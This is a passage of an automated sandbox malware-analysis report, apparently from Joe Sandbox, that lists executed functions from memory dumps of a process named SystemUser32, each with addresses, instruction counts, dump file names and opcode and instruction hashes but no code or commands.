                                                • Opcode Fuzzy Hash: 0aab3e3e4f9fc5d7cca3c9d103490d44dd96b8c8d0363243163e4a70d2094c2a
                                                • Instruction Fuzzy Hash: 8C31E7A291D78A4FE742EB6CD8652F97FB0EF96210F4541BBC08DC7193DE18A8098391
                                                Function 00007FFAACCD0E30 Relevance: .5, Instructions: 515COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.1963748277.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_7ffaaccd0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: aa7f6dfe5d0304329876aa61b2051f5b1a6e6d103c92342c6d477d30d7decf48
                                                • Instruction ID: c4605250839114b4568e6c4c5316f1b02b7a053982142447aa4114b3f042ef30
                                                • Opcode Fuzzy Hash: aa7f6dfe5d0304329876aa61b2051f5b1a6e6d103c92342c6d477d30d7decf48
                                                • Instruction Fuzzy Hash: 2B21B5A191D78A4FEB46DB68C8652FD7FB1FF56200F4540ABD04ED32D3DD28A8198391
                                                Function 00007FFAACCD12C9 Relevance: .2, Instructions: 246COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.1963748277.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_7ffaaccd0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: afe8941444cbd477c5c869445f7848b3150bf5b85473a16d2a14a591738dabbe
                                                • Instruction ID: be2992ac40d6a3b4a4158627ec643d4fe34c70da423e861e74a8f88cd37996dd
                                                • Opcode Fuzzy Hash: afe8941444cbd477c5c869445f7848b3150bf5b85473a16d2a14a591738dabbe
                                                • Instruction Fuzzy Hash: 5D71A761B29A495FEB99FB78D4697BD7792FF89310F8044B9E40EC32D2DE28D8118740
                                                Function 00007FFAACCD0C3E Relevance: .2, Instructions: 189COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.1963748277.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_7ffaaccd0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 275d0ae771bc8d692b266d85a0549917730a00e5b330ce426c194b99a88823de
                                                • Instruction ID: 6840915f95191503cd0c5ff00e04e2fff4ca8f3817ac3a6d00c6374b8cd6f3b8
                                                • Opcode Fuzzy Hash: 275d0ae771bc8d692b266d85a0549917730a00e5b330ce426c194b99a88823de
                                                • Instruction Fuzzy Hash: EB512662A0E6864FE397A73CD8656B57BE5EF8722070940FBD48CC7193DD18AC478392
                                                Function 00007FFAACCD0538 Relevance: .1, Instructions: 135COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.1963748277.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_7ffaaccd0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 091508b2e4ec3af4508012d0dc1e1e12d19261797687b966b9323db857d5aeb1
                                                • Instruction ID: fff22109d4d05f43d90f156254e7671172a70ceb0ef6d61e61d1df7ac5457d13
                                                • Opcode Fuzzy Hash: 091508b2e4ec3af4508012d0dc1e1e12d19261797687b966b9323db857d5aeb1
                                                • Instruction Fuzzy Hash: 9D31C662B189490FE788FB7CD46A779B6C6EF99215F0405FEE00EC3293DE649C428380
                                                Function 00007FFAACCD0AD1 Relevance: .1, Instructions: 130COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.1963748277.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_7ffaaccd0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a95b791de0fdc94f1255f8e7fef2cb87faa55f7050a59e534593944493d7158a
                                                • Instruction ID: 572143fa01fdec74f02e4d1c5c8932cc637afeeca924a08e1d1c35b5a61b4714
                                                • Opcode Fuzzy Hash: a95b791de0fdc94f1255f8e7fef2cb87faa55f7050a59e534593944493d7158a
                                                • Instruction Fuzzy Hash: E731E3A2B19A095FF745BBBC885E7BD77D5EF99211F0442BBE00DC3292DE2898018391
                                                Function 00007FFAACCD0985 Relevance: .1, Instructions: 117COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.1963748277.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_7ffaaccd0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 214eb555dfb026fd82a2df0efca513d0ef3f2a0a3d5933e7e0f2e25909228a76
                                                • Instruction ID: 010db8e8f769440c1899f9f78955bbfab263c670662a61294dc2629b91ca2f90
                                                • Opcode Fuzzy Hash: 214eb555dfb026fd82a2df0efca513d0ef3f2a0a3d5933e7e0f2e25909228a76
                                                • Instruction Fuzzy Hash: A531A2B1A18A4D8FEB44EB78C4657EDBBA1FF99300F9045B5D00DC3382CE38A8468745
                                                Function 00007FFAACCD0868 Relevance: .1, Instructions: 76COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.1963748277.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_7ffaaccd0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 69b68e55e233eb95913360be3490cdc5702c6815f9d7a7fee70c97a7e7b79a23
                                                • Instruction ID: d2a0b89aa70024ded4916d655cdf40568f9008da5ce33ca9ed17a9c00d9d784e
                                                • Opcode Fuzzy Hash: 69b68e55e233eb95913360be3490cdc5702c6815f9d7a7fee70c97a7e7b79a23
                                                • Instruction Fuzzy Hash: FA21E6F56586CA4FD380EB38D4A8BA9BF61BF89210FC244E5D40DC3397DE2499028746
                                                Function 00007FFAACCD1E71 Relevance: .0, Instructions: 42COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.1963748277.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_7ffaaccd0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 43232cfb5445a50aebd4f66ac5d8c43252a09ff4d6398eb4d340200024b8906a
                                                • Instruction ID: e6c7ba295a7108f614479941d19610d86f7c48307c72642f2d4e90fde05984cd
                                                • Opcode Fuzzy Hash: 43232cfb5445a50aebd4f66ac5d8c43252a09ff4d6398eb4d340200024b8906a
                                                • Instruction Fuzzy Hash: BD012655C0E7C58FF752AB389859672BFE0DF97220B0804ABE48CC7593E918A95983C2

                                                Executed Functions

                                                Function 00007FFAACCB1CA1 Relevance: .2, Instructions: 207COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2021448153.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_7ffaaccb0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 45baec648fb452477417c2bc5f43902a5fc3d9922811e10d3fc8579a3df0fdbc
                                                • Instruction ID: ecf3de82c9223b2a67c010599a2f8dba15360cc4d56f14da5cec31efcc0d5b8b
                                                • Opcode Fuzzy Hash: 45baec648fb452477417c2bc5f43902a5fc3d9922811e10d3fc8579a3df0fdbc
                                                • Instruction Fuzzy Hash: 60513551A1E6C54FE786ABB888646757FD9DF87215B1804FBE0CDC71D3DD18580AC382
                                                Function 00007FFAACCB0DF2 Relevance: .5, Instructions: 549COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2021448153.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_7ffaaccb0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 39da02e9401210624bf0b7105a205ec02a0e7634d8653c111981834708170746
                                                • Instruction ID: a29909034f2d29d82912eaa3d89b4343ca5931ab87627b6183db74a254e48a7c
                                                • Opcode Fuzzy Hash: 39da02e9401210624bf0b7105a205ec02a0e7634d8653c111981834708170746
                                                • Instruction Fuzzy Hash: 4F3108A2D1DB8A4FE745EBB894651F97FF0FF95211B4440BAC08DCB593DE14980A8391
                                                Function 00007FFAACCB0E30 Relevance: .5, Instructions: 518COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2021448153.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_7ffaaccb0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9ed9da70320f4f48ced678da58727c5ecc33bb10061f32eb3c5244bf338a4dfc
                                                • Instruction ID: e8fbc3c440a7817ae5236833bc055a0e283a0b79aaf959c8df825a0df5b3507b
                                                • Opcode Fuzzy Hash: 9ed9da70320f4f48ced678da58727c5ecc33bb10061f32eb3c5244bf338a4dfc
                                                • Instruction Fuzzy Hash: 202194A191CB8A8FE745DBA888651F9BFF1FF5A200F4540AAD04ED75D3DD14A8058381
                                                Function 00007FFAACCB12C9 Relevance: .2, Instructions: 246COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2021448153.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_7ffaaccb0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d30c88584d9a3aafdd5383b0a55d00e34ecacc66816f04b8409e485b50864b1c
                                                • Instruction ID: a6851801ab438671d64f100696c0aa63a1d69185020d31dd5b75af02b61644bf
                                                • Opcode Fuzzy Hash: d30c88584d9a3aafdd5383b0a55d00e34ecacc66816f04b8409e485b50864b1c
                                                • Instruction Fuzzy Hash: 5A7155A1A19A595FEB98BB79D4597FD76A2FF8D310B4044BDE00EC32D3DE289805C780
                                                Function 00007FFAACCB0C3E Relevance: .2, Instructions: 187COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2021448153.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_7ffaaccb0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 57d47bc8baa7ffa678cfa00188abf07216feeec6ebd7ad199e8d4ddc775d1337
                                                • Instruction ID: 3f0e700405fec8ad814a05a8da73197782dace4a61152fba88cf4245b3141031
                                                • Opcode Fuzzy Hash: 57d47bc8baa7ffa678cfa00188abf07216feeec6ebd7ad199e8d4ddc775d1337
                                                • Instruction Fuzzy Hash: A1514862A0E7864FE356A77CD8555B53BE5EF87220B0940FBD48CC7193DD18AC4A8392
                                                Function 00007FFAACCB0538 Relevance: .1, Instructions: 135COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2021448153.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_7ffaaccb0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 930104aeee2e90302f117e75db562f98b3ede2c712c094d8b836de31c90bb338
                                                • Instruction ID: 2a7471683a7205d280a72dca8e35969cc3aa5e68de6996480a145e9a94ec9976
                                                • Opcode Fuzzy Hash: 930104aeee2e90302f117e75db562f98b3ede2c712c094d8b836de31c90bb338
                                                • Instruction Fuzzy Hash: 4631B362B189490FE788BB7DD46A679B6C6EF99215F0405FAE00EC3293DD689C428380
                                                Function 00007FFAACCB0AD1 Relevance: .1, Instructions: 130COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2021448153.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_7ffaaccb0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 947aa5f6805eed594154f49fd7b83f760015c9ce8fcf6c9eafa5cf6f68645b98
                                                • Instruction ID: a70195f14a2f0a7b743e94a01f7a7b53c2a84e3c9b530a7e3f1f0801fb50d7e5
                                                • Opcode Fuzzy Hash: 947aa5f6805eed594154f49fd7b83f760015c9ce8fcf6c9eafa5cf6f68645b98
                                                • Instruction Fuzzy Hash: 2231D2A2B19A095BF744BBB9881E7BD77D5EF99211F0442B6E00DC3293DE28D8058391
                                                Function 00007FFAACCB0985 Relevance: .1, Instructions: 117COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2021448153.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_7ffaaccb0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 533c068d7b68c6aa7d4fec5cbc7d83243876141879935afc6f40f9f309b626e0
                                                • Instruction ID: 52efb92dc8a01c418da27403cb725ae4516e3213866482f81141fcb330265976
                                                • Opcode Fuzzy Hash: 533c068d7b68c6aa7d4fec5cbc7d83243876141879935afc6f40f9f309b626e0
                                                • Instruction Fuzzy Hash: B23180B1A18A0A8FEB44EBB8C4556F9B7A1FF9D301F5045B9D00DC7293CE38A8458781
                                                Function 00007FFAACCB0868 Relevance: .1, Instructions: 77COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2021448153.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_7ffaaccb0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0fef386e1108e7c1cee8d8afb2d4ed4f9f41668fb17859432eed4439f752884c
                                                • Instruction ID: 73c985d4bf117424f7d8fdd36839b0d7043245ec02fc5d9a01419b7c4e804476
                                                • Opcode Fuzzy Hash: 0fef386e1108e7c1cee8d8afb2d4ed4f9f41668fb17859432eed4439f752884c
                                                • Instruction Fuzzy Hash: D7218FE56AC6094FD341EB3CD05AAF9BF71AF8E215B8045E9D00DC7397DE28A9008792
                                                Function 00007FFAACCB1E71 Relevance: .0, Instructions: 42COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2021448153.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_7ffaaccb0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 13822983a0b0fbdf951333f8a87c1aab4b8d25416cb4a922e39173bbe5aeba37
                                                • Instruction ID: 436197c508b3a4dc8b23335a719f55bbd31c3e4c7b658ca57e41f167187af6fa
                                                • Opcode Fuzzy Hash: 13822983a0b0fbdf951333f8a87c1aab4b8d25416cb4a922e39173bbe5aeba37
                                                • Instruction Fuzzy Hash: 9301F255C0E7C48EF752AB795859572BFE0DF9B210B0844AEF48DC6093D908A9488382

                                                Executed Functions

                                                Function 00007FFAACCD1CA1 Relevance: .2, Instructions: 207COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2042632138.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ffaaccd0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d956196a562666521381493b4619a1f51d8c2bf905e247d8d0e832c24a84e8a0
                                                • Instruction ID: 548b9b6ccced77c6d58369fa4e5f49a0089f5248b7be1acb3919598b5c36217d
                                                • Opcode Fuzzy Hash: d956196a562666521381493b4619a1f51d8c2bf905e247d8d0e832c24a84e8a0
                                                • Instruction Fuzzy Hash: 78512451A1E6C94FE787AB7898686757FD5DF87225B1804FBE0CDC7193DE184806C382
                                                Function 00007FFAACCD0DE0 Relevance: .6, Instructions: 550COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2042632138.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ffaaccd0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c237e9f1c4f37bef4845522059a2e9a8daca1c9a49ee8b21f4dedf7042b88f4f
                                                • Instruction ID: ba24320ff50d00b72e6c6e0cc9764bef1470c29ee0ea7eb78d0418b6d42d5e49
                                                • Opcode Fuzzy Hash: c237e9f1c4f37bef4845522059a2e9a8daca1c9a49ee8b21f4dedf7042b88f4f
                                                • Instruction Fuzzy Hash: 7731F8A2D1D78A4FE742EB6C98652FD7FB0EF96211F4441BBC08DC7193DE1898098391
                                                Function 00007FFAACCD0E30 Relevance: .5, Instructions: 515COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2042632138.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ffaaccd0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bf894c5b51b7b3bf929b896de89f5cc71c89c9b3ce7e57a7fb20c71f8bdfdbb2
                                                • Instruction ID: 44ec7062a7f84aa2bfa469b86ef2692d0a0f327e8186673743f928a93486aafb
                                                • Opcode Fuzzy Hash: bf894c5b51b7b3bf929b896de89f5cc71c89c9b3ce7e57a7fb20c71f8bdfdbb2
                                                • Instruction Fuzzy Hash: 6A21B7A191D78A4FEB46DB6888652FD7FB1FF9A200F4540ABD04ED31D3DD189805C391
                                                Function 00007FFAACCD12C9 Relevance: .2, Instructions: 246COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2042632138.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ffaaccd0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dd709e4775f28b1dc4f9307ddd3e7afa3fcb9c41e0ca794868309312d7e13310
                                                • Instruction ID: 81066b538b9b7ef5d36f5e0b8e703d1aed30cf3471c7dbd596d147a6083550ef
                                                • Opcode Fuzzy Hash: dd709e4775f28b1dc4f9307ddd3e7afa3fcb9c41e0ca794868309312d7e13310
                                                • Instruction Fuzzy Hash: 7971A461B29A495FEB99BB78D45D7BD7692FF89311F8044B9E40EC32D3DE289810C780
                                                Function 00007FFAACCD0C3E Relevance: .2, Instructions: 189COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2042632138.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ffaaccd0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a11546bfe6ea0a5a3ef69d74ffd467b1f81b8f223c46d6255fa3661a295a0c49
                                                • Instruction ID: c302241201de1359a47cbac648adc5f9940cb5da623b1a3854ac33927c93f184
                                                • Opcode Fuzzy Hash: a11546bfe6ea0a5a3ef69d74ffd467b1f81b8f223c46d6255fa3661a295a0c49
                                                • Instruction Fuzzy Hash: 10512862A0E6864FE357A73CD8656B57BD5EF87210B0940FBD48CC7193DD189C468392
                                                Function 00007FFAACCD0538 Relevance: .1, Instructions: 135COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2042632138.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ffaaccd0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 57d9bdee97bfcccc7d250379d99c5aed6b84cef17d6648aaf983cb387e262882
                                                • Instruction ID: 48d1acf9feb982f27b58d0d5adf7bc7a8a0f4ece4d648965c1229ad04bf53993
                                                • Opcode Fuzzy Hash: 57d9bdee97bfcccc7d250379d99c5aed6b84cef17d6648aaf983cb387e262882
                                                • Instruction Fuzzy Hash: 3831B562B189490FE688BB6CD45A779B6C6EF99215F0405FEE00EC3293DE649C418380
                                                Function 00007FFAACCD0AD1 Relevance: .1, Instructions: 130COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2042632138.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ffaaccd0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a95b791de0fdc94f1255f8e7fef2cb87faa55f7050a59e534593944493d7158a
                                                • Instruction ID: 572143fa01fdec74f02e4d1c5c8932cc637afeeca924a08e1d1c35b5a61b4714
                                                • Opcode Fuzzy Hash: a95b791de0fdc94f1255f8e7fef2cb87faa55f7050a59e534593944493d7158a
                                                • Instruction Fuzzy Hash: E731E3A2B19A095FF745BBBC885E7BD77D5EF99211F0442BBE00DC3292DE2898018391
                                                Function 00007FFAACCD0985 Relevance: .1, Instructions: 117COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2042632138.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ffaaccd0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4944d6770d918f517177c6ebfbb2bfa3817163b5a77bf4bcaab5bde49a980e87
                                                • Instruction ID: 39a873db6259c95c3ba6fd8c28b9beaac0dad002e06d26bf096c14cec906ebdc
                                                • Opcode Fuzzy Hash: 4944d6770d918f517177c6ebfbb2bfa3817163b5a77bf4bcaab5bde49a980e87
                                                • Instruction Fuzzy Hash: A331A3B1A18A0D8FEB45EB78D459BEDB7A2FF99301F5045B9D00DC3292CE38A805C781
                                                Function 00007FFAACCD0868 Relevance: .1, Instructions: 76COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2042632138.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ffaaccd0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a461d79d3f66617bf6682fefa10eb01018d3a148b7e8a3962b4ec7609570742d
                                                • Instruction ID: d5f624b339635a0e9a853ed7558902e54789161f3e058316487e21304553a7d3
                                                • Opcode Fuzzy Hash: a461d79d3f66617bf6682fefa10eb01018d3a148b7e8a3962b4ec7609570742d
                                                • Instruction Fuzzy Hash: 852180E56586494FD741EB28D499EE9FF62EF8D311F8044E9D40DC3397DE289900CB92
                                                Function 00007FFAACCD1E71 Relevance: .0, Instructions: 42COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2042632138.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ffaaccd0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bdcd3173f1b4432e7ab26813dc1f05173035a156c0fcc3776ca43e88c105a6e9
                                                • Instruction ID: 454e29b7ca1ea778d21a594d446509909e48b8dee757879b5a9804b435a2153c
                                                • Opcode Fuzzy Hash: bdcd3173f1b4432e7ab26813dc1f05173035a156c0fcc3776ca43e88c105a6e9
                                                • Instruction Fuzzy Hash: E201F29580E7858FF752AB385859662BFE1DF96220F0804ABE48CC6493E918A95883C2